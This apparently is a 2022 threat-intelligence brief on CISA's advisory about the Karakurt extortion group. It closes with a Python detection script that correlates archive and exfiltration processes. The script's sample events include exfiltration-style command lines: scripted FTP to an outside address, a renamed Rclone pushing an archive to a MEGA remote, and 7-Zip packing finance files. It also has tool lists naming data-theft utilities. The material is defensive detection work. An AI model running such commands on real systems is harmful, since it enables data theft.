2022-06-07

CISA Warns of Data Extortion Group Karakurt

Level: Tactical | Source: CISA

A recent advisory from the Cybersecurity & Infrastructure Security Agency (CISA) shares details on the data extortion group Karakurt. Victims have not reported any encryption impact; the group's operations focus on data exfiltration and extortion rather than on deploying ransomware. Organizations in every industry appear to be in scope. Karakurt has contacted victim employees, business partners, and clients to pressure and embarrass the victim organization into meeting its ransom demands. If the demands are met, the group provides proof that the stolen data was deleted and also explains to the victim how the intrusion was achieved. Victims have nonetheless reported the actors dealing in bad faith: "Although Karakurt’s primary extortion leverage is a promise to delete stolen data and keep the incident confidential, some victims reported Karakurt actors did not maintain the confidentiality of victim information after a ransom was paid." Karakurt's leak site is hosted on the dark web; as of May 2022 it held "several terabytes of data" and listed victims in North America and Europe.

Karakurt commonly gains initial access with purchased credentials, and exploitation of widely known vulnerabilities such as Log4Shell (CVE-2021-44228) has also been observed. Once inside, the actors use Cobalt Strike to enumerate the network and Mimikatz to harvest credentials. Data of interest is collected and compressed, often with 7-Zip, then exfiltrated over FTP, with Rclone, or to MEGA. The group has also been found to exaggerate the volume of data stolen: in some cases the claimed volume exceeded the victim's storage capacity, and in others the actors presented data that "did not belong to the victim."

U.S. federal agencies "strongly discourage" affected organizations from paying Karakurt's ransom demands.

Anvilogic Use Cases:

  • Potential CVE-2021-44228 - Log4Shell
  • Suspicious Email Attachment
  • Executable Create Script Process
  • Mimikatz
  • Cobalt Strike Beacon
  • Utility Archive Data
  • Native Archive Commands
  • Windows FTP Exfiltration
  • Rclone Execution
  • Large Data Transfer Proxy
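As an added example (not content from the CISA advisory or from Anvilogic's own detections), the Python below sketches how the archive and exfiltration use cases above can be correlated: any 7-Zip, native archive, Rclone, scripted FTP, or MEGA client execution is flagged on its own, and an exfiltration tool that runs within a window after an archive utility on the same host raises a higher-confidence "collection then exfiltration" alert. The events are constructed, Sysmon-style process-creation records; the binary name lists, the renamed-Rclone heuristic, and the two-hour window are assumptions chosen for illustration.

```python
"""
Added detection example: correlate archive-utility and exfiltration-tool
process creations on the same host. Sample events are constructed, not real
telemetry; tool name lists and the window are assumptions, not advisory values.
"""
import ntpath
import re
from datetime import datetime, timedelta

# Archive utilities: 7-Zip (named in the advisory) plus common native equivalents.
ARCHIVE_IMAGES = {"7z.exe", "7za.exe", "7zr.exe", "winrar.exe", "rar.exe",
                  "tar.exe", "makecab.exe"}
NATIVE_ARCHIVE_MARKERS = ("compress-archive",)       # PowerShell cmdlet
# Exfiltration clients: Rclone and MEGA desktop/CLI binaries (assumed names).
EXFIL_IMAGES = {"rclone.exe", "megasync.exe", "megaclient.exe"}
# Rclone is often renamed, so also match its argument shape: a transfer verb
# plus a "remote:path" token. Two or more characters before the colon rule out
# drive letters such as C:\, and the lookahead rules out URLs such as https://.
RCLONE_VERBS = {"copy", "sync", "move"}
REMOTE_TOKEN = re.compile(r"^[a-z][a-z0-9_-]+:(?!//)")
CORRELATION_WINDOW = timedelta(hours=2)              # assumption


def classify(event):
    """Label one process-creation event as 'archive', 'exfil', or None."""
    image = ntpath.basename(event["image"]).lower()
    cmd = event["command_line"].lower()
    tokens = cmd.split()
    if image in ARCHIVE_IMAGES or any(m in cmd for m in NATIVE_ARCHIVE_MARKERS):
        return "archive"
    if image in EXFIL_IMAGES:
        return "exfil"
    if image == "ftp.exe" and any(t.startswith("-s:") for t in tokens):
        return "exfil"                               # scripted Windows FTP client
    if RCLONE_VERBS & set(tokens) and any(REMOTE_TOKEN.match(t) for t in tokens):
        return "exfil"                               # renamed Rclone heuristic
    return None


def correlate(events):
    """Return (host, alert_name, command_line) tuples in time order.

    Every archive or exfil hit is reported on its own; an exfil hit that follows
    an archive hit on the same host within CORRELATION_WINDOW additionally
    raises the higher-confidence 'collection_then_exfil' alert.
    """
    alerts = []
    last_archive = {}                                # host -> last archive time
    for ev in sorted(events, key=lambda e: e["time"]):
        kind = classify(ev)
        if kind is None:
            continue
        host, ts, cmd = ev["host"], ev["time"], ev["command_line"]
        if kind == "archive":
            last_archive[host] = ts
            alerts.append((host, "archive_utility", cmd))
        else:
            alerts.append((host, "exfil_tool", cmd))
            if host in last_archive and ts - last_archive[host] <= CORRELATION_WINDOW:
                alerts.append((host, "collection_then_exfil", cmd))
    return alerts


def _ev(host, hhmm, image, command_line):
    hour, minute = (int(x) for x in hhmm.split(":"))
    return {"host": host, "time": datetime(2022, 5, 20, hour, minute),
            "image": image, "command_line": command_line}


# Constructed sample telemetry (hosts, paths and times are made up).
SAMPLE_EVENTS = [
    _ev("ws03", "08:00", r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        r"powershell.exe -c Compress-Archive -Path C:\HR -DestinationPath C:\Temp\hr.zip"),
    _ev("ws02", "09:00", r"C:\Windows\System32\ftp.exe",
        r"ftp.exe -s:C:\Temp\up.txt 203.0.113.10"),
    _ev("ws01", "10:00", r"C:\Program Files\7-Zip\7z.exe",
        r"7z.exe a -pS3cret C:\Temp\out.7z D:\Finance\*"),
    _ev("ws01", "10:25", r"C:\Temp\svchost.exe",      # Rclone renamed to blend in
        r"svchost.exe copy C:\Temp\out.7z mega:drop --transfers 8"),
    _ev("ws03", "11:30", r"C:\Users\j\rclone.exe",   # 3.5 h after the archive: no chain
        r"rclone.exe sync C:\Temp\hr.zip backup:hr"),
    _ev("ws04", "12:00", r"C:\Program Files\Google\Chrome\Application\chrome.exe",
        r'"C:\Program Files\Google\Chrome\Application\chrome.exe" https://mega.nz/file/abc'),
    _ev("ws04", "12:05", r"C:\Windows\System32\cmd.exe",
        r"cmd.exe /c copy C:\a.txt D:\b.txt"),   # benign copy, no remote token
]


def run_example():
    return correlate(SAMPLE_EVENTS)


if __name__ == "__main__":
    for host, name, cmd in run_example():
        print(f"{host:5} {name:22} {cmd}")
```

On the sample, ws01 produces the chained alert (7-Zip followed 25 minutes later by a renamed Rclone pushing to a `mega:` remote), ws03 produces only standalone hits because its Rclone run falls outside the window, ws02 fires on scripted FTP alone, and ws04's browser and `copy` commands produce nothing. In production the window, the tool lists, and the remote-token heuristic should be tuned against the organization's own baseline.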
